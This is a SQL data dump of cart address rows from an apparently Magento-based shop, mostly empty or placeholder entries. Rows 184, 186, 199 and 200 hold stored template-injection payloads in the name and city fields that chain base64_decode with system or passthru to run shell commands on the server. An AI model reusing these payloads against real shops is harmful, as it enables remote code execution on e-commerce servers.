(183, 87, '2022-10-07 22:13:50', '2022-10-07 22:13:50', NULL, 0, NULL, 'billing', NULL, NULL, '1', NULL, '1', NULL, NULL, '3001 W OLD YANKTON RD', 'San Francisco', 'California', 12, '94123', 'US', '6309918051', NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(184, 87, '2022-10-07 22:13:50', '2022-10-07 22:14:03', NULL, 0, NULL, 'shipping', NULL, NULL, '{{var this.getTemplateFilter().filter($order.shipping_address.city)}}{{var this.getTemplateFilter().addAfterFilterCallback($order.shipping_address.last_name).filter($order.shipping_address.city)}}', NULL, 'system', NULL, NULL, '3001 W OLD YANKTON RD', 'pwd', 'California', 12, '94123', 'US', '6309918051', NULL, 0, 0, 'tablerate_bestway', 'Best Way - Table Rate', 1.0000, 54.0000, 54.0000, 54.0000, 54.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 54.0000, 54.0000, NULL, '[]', NULL, 0.0000, 0.0000, 54.0000, 54.0000, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1),
(185, 88, '2022-10-08 16:38:02', '2022-10-08 16:38:02', NULL, 0, NULL, 'billing', NULL, NULL, '1', NULL, '1', NULL, NULL, '3001 W OLD YANKTON RD', 'San Francisco', 'California', 12, '94123', 'US', '6309918051', NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(186, 88, '2022-10-08 16:38:02', '2022-10-08 16:38:07', NULL, 0, NULL, 'shipping', NULL, NULL, '{{var this.getTemplateFilter().filter(dummy)', NULL, '}}{{var this.getTemplateFilter().addAfterFilterCallback(base64_decode).addAfterFilterCallback(system).filter(bHMgLWFs', NULL, NULL, '3001 W OLD YANKTON RD', ')}}', 'California', 12, '94123', 'US', '6309918051', NULL, 0, 0, 'tablerate_bestway', 'Best Way - Table Rate', 1.0000, 54.0000, 54.0000, 54.0000, 54.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 54.0000, 54.0000, NULL, '[]', NULL, 0.0000, 0.0000, 54.0000, 54.0000, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1),
(187, 89, '2022-10-24 18:48:15', '2022-10-24 18:48:15', 57, 0, NULL, 'billing', 'kegix91872@adroh.com', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(188, 89, '2022-10-24 18:48:15', '2022-10-24 18:48:15', 57, 0, NULL, 'shipping', 'kegix91872@adroh.com', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(189, 90, '2022-11-21 04:16:58', '2022-11-21 04:16:58', 58, 0, NULL, 'billing', 'Bok3yicexi@tempr.email', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(190, 90, '2022-11-21 04:16:59', '2022-11-21 04:16:59', 58, 0, NULL, 'shipping', 'Bok3yicexi@tempr.email', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(191, 91, '2022-12-05 21:04:53', '2022-12-05 21:04:53', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(192, 91, '2022-12-05 21:04:53', '2022-12-05 21:04:53', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 1, NULL, NULL, 65.0000, 3510.0000, 3510.0000, 2808.0000, 2808.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, -702.0000, -702.0000, 2808.0000, 2808.0000, NULL, '[]', NULL, 0.0000, 0.0000, 3510.0000, 3510.0000, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1),
(193, 92, '2022-12-15 01:36:59', '2022-12-15 01:36:59', 61, 0, NULL, 'billing', 'klidrgyjqn@gmail.com', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(194, 92, '2022-12-15 01:37:00', '2022-12-15 01:37:00', 61, 0, NULL, 'shipping', 'klidrgyjqn@gmail.com', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(195, 93, '2022-12-29 16:21:10', '2022-12-29 16:21:10', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, NULL, NULL, NULL, NULL, 1, 1, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(196, 93, '2022-12-29 16:21:10', '2022-12-29 16:21:10', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(197, 94, '2023-01-18 10:11:01', '2023-01-18 10:11:01', NULL, 0, NULL, 'billing', NULL, NULL, 'john', NULL, 'der', NULL, NULL, '123st', 'new york', NULL, NULL, '10001', 'BD', '123123232', NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(198, 94, '2023-01-18 10:11:01', '2023-01-18 10:12:21', NULL, 0, NULL, 'shipping', NULL, NULL, 'john', NULL, 'der', NULL, NULL, '123st', 'new york', NULL, NULL, '1234', 'BD', '123123232', NULL, 0, 0, 'flatrate_flatrate', 'Flat Rate - Fixed', 0.0000, 643.0000, 643.0000, 514.4000, 514.4000, 0.0000, 0.0000, 5.0000, 5.0000, 0.0000, 0.0000, -128.6000, -128.6000, 519.4000, 519.4000, NULL, '[]', NULL, 0.0000, 0.0000, 643.0000, 643.0000, 0.0000, 0.0000, 0.0000, NULL, 5.0000, 5.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1),
(199, 95, '2023-03-05 17:54:19', '2023-03-05 17:54:19', NULL, 0, NULL, 'billing', NULL, NULL, '{{var this.getTemplateFilter().filter(foobar)}}{{var this.getTemplateFilter().addAfterFilterCallback(base64_decode).addAfterFilterCallback(passthru).filter(ZWNobyAicDBrM19jMEsi)}}', NULL, 'sss', NULL, 'ssd', '38 Woodwark Crescent', 'Wrights Creek', 'Australian Capital Territory', NULL, '4869', 'AU', '84389299922', NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(200, 95, '2023-03-05 17:54:19', '2023-03-05 17:54:27', NULL, 0, NULL, 'shipping', NULL, NULL, '{{var this.getTemplateFilter().filter(foobar)}}{{var this.getTemplateFilter().addAfterFilterCallback(base64_decode).addAfterFilterCallback(passthru).filter(ZWNobyAicDBrM19jMEsi)}}', NULL, 'sss', NULL, 'ssd', '38 Woodwark Crescent', 'Wrights Creek', 'Australian Capital Territory', 569, '4869', 'AU', '84389299922', NULL, 0, 0, 'flatrate_flatrate', 'Flat Rate - Fixed', 1.0000, 54.0000, 54.0000, 54.0000, 54.0000, 0.0000, 0.0000, 5.0000, 5.0000, 0.0000, 0.0000, 0.0000, 0.0000, 59.0000, 59.0000, NULL, '[]', NULL, 0.0000, 0.0000, 54.0000, 54.0000, 0.0000, 0.0000, 0.0000, NULL, 5.0000, 5.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1),
(201, 96, '2023-05-31 16:43:20', '2023-05-31 16:43:20', 67, 0, NULL, 'billing', 'wiliv29563@goflipa.com', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(202, 96, '2023-05-31 16:43:20', '2023-05-31 16:43:20', 67, 0, NULL, 'shipping', 'wiliv29563@goflipa.com', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(203, 97, '2023-06-18 23:46:27', '2023-06-18 23:46:27', 68, 0, NULL, 'billing', 'Galandean171@aveuva.com', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(204, 97, '2023-06-18 23:46:27', '2023-06-18 23:46:27', 68, 0, NULL, 'shipping', 'Galandean171@aveuva.com', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(205, 98, '2023-06-27 18:56:11', '2023-06-27 18:56:11', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(206, 98, '2023-06-27 18:56:11', '2023-06-27 18:56:11', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, 1.0000, 234.0000, 234.0000, 187.2000, 187.2000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, -46.8000, -46.8000, 187.2000, 187.2000, NULL, '[]', NULL, 0.0000, 0.0000, 234.0000, 234.0000, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1),
(207, 99, '2023-06-27 18:56:12', '2023-06-27 18:56:12', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0);
INSERT INTO `quote_address` (`address_id`, `quote_id`, `created_at`, `updated_at`, `customer_id`, `save_in_address_book`, `customer_address_id`, `address_type`, `email`, `prefix`, `firstname`, `middlename`, `lastname`, `suffix`, `company`, `street`, `city`, `region`, `region_id`, `postcode`, `country_id`, `telephone`, `fax`, `same_as_billing`, `collect_shipping_rates`, `shipping_method`, `shipping_description`, `weight`, `subtotal`, `base_subtotal`, `subtotal_with_discount`, `base_subtotal_with_discount`, `tax_amount`, `base_tax_amount`, `shipping_amount`, `base_shipping_amount`, `shipping_tax_amount`, `base_shipping_tax_amount`, `discount_amount`, `base_discount_amount`, `grand_total`, `base_grand_total`, `customer_notes`, `applied_taxes`, `discount_description`, `shipping_discount_amount`, `base_shipping_discount_amount`, `subtotal_incl_tax`, `base_subtotal_total_incl_tax`, `discount_tax_compensation_amount`, `base_discount_tax_compensation_amount`, `shipping_discount_tax_compensation_amount`, `base_shipping_discount_tax_compensation_amnt`, `shipping_incl_tax`, `base_shipping_incl_tax`, `vat_id`, `vat_is_valid`, `vat_request_id`, `vat_request_date`, `vat_request_success`, `validated_country_code`, `validated_vat_number`, `gift_message_id`, `free_shipping`) VALUES
(208, 99, '2023-06-27 18:56:12', '2023-06-27 18:56:12', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, 1.0000, 234.0000, 234.0000, 187.2000, 187.2000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, -46.8000, -46.8000, 187.2000, 187.2000, NULL, '[]', NULL, 0.0000, 0.0000, 234.0000, 234.0000, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1),
(209, 100, '2023-06-27 19:07:44', '2023-06-27 19:07:44', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(210, 100, '2023-06-27 19:07:44', '2023-06-27 19:07:44', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, 1.0000, 234.0000, 234.0000, 187.2000, 187.2000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, -46.8000, -46.8000, 187.2000, 187.2000, NULL, '[]', NULL, 0.0000, 0.0000, 234.0000, 234.0000, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1),
(211, 101, '2023-06-27 19:08:00', '2023-06-27 19:08:00', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(212, 101, '2023-06-27 19:08:00', '2023-06-27 19:08:00', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, 1.0000, 234.0000, 234.0000, 187.2000, 187.2000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, -46.8000, -46.8000, 187.2000, 187.2000, NULL, '[]', NULL, 0.0000, 0.0000, 234.0000, 234.0000, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1),
(213, 102, '2023-06-27 19:23:17', '2023-06-27 19:23:17', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(214, 102, '2023-06-27 19:23:17', '2023-06-27 19:23:17', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, 1.0000, 234.0000, 234.0000, 187.2000, 187.2000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, -46.8000, -46.8000, 187.2000, 187.2000, NULL, '[]', NULL, 0.0000, 0.0000, 234.0000, 234.0000, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1),
(215, 103, '2023-06-27 19:23:28', '2023-06-27 19:23:28', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(216, 103, '2023-06-27 19:23:29', '2023-06-27 19:23:29', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, 1.0000, 234.0000, 234.0000, 187.2000, 187.2000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, -46.8000, -46.8000, 187.2000, 187.2000, NULL, '[]', NULL, 0.0000, 0.0000, 234.0000, 234.0000, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1),
(217, 104, '2023-06-27 19:45:20', '2023-06-27 19:45:20', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(218, 104, '2023-06-27 19:45:20', '2023-06-27 19:45:20', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, 1.0000, 234.0000, 234.0000, 187.2000, 187.2000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, -46.8000, -46.8000, 187.2000, 187.2000, NULL, '[]', NULL, 0.0000, 0.0000, 234.0000, 234.0000, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1),
(219, 105, '2023-06-27 19:45:40', '2023-06-27 19:45:40', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(220, 105, '2023-06-27 19:45:40', '2023-06-27 19:45:40', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, 1.0000, 234.0000, 234.0000, 187.2000, 187.2000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, -46.8000, -46.8000, 187.2000, 187.2000, NULL, '[]', NULL, 0.0000, 0.0000, 234.0000, 234.0000, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1),
(221, 106, '2023-06-27 20:00:54', '2023-06-27 20:00:54', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(222, 106, '2023-06-27 20:00:54', '2023-06-27 20:00:54', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, 1.0000, 234.0000, 234.0000, 187.2000, 187.2000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, -46.8000, -46.8000, 187.2000, 187.2000, NULL, '[]', NULL, 0.0000, 0.0000, 234.0000, 234.0000, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1),
(223, 107, '2023-06-27 20:01:14', '2023-06-27 20:01:14', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(224, 107, '2023-06-27 20:01:14', '2023-06-27 20:01:14', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, 1.0000, 234.0000, 234.0000, 187.2000, 187.2000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, -46.8000, -46.8000, 187.2000, 187.2000, NULL, '[]', NULL, 0.0000, 0.0000, 234.0000, 234.0000, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1),
(225, 108, '2023-06-27 20:17:28', '2023-06-27 20:17:28', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
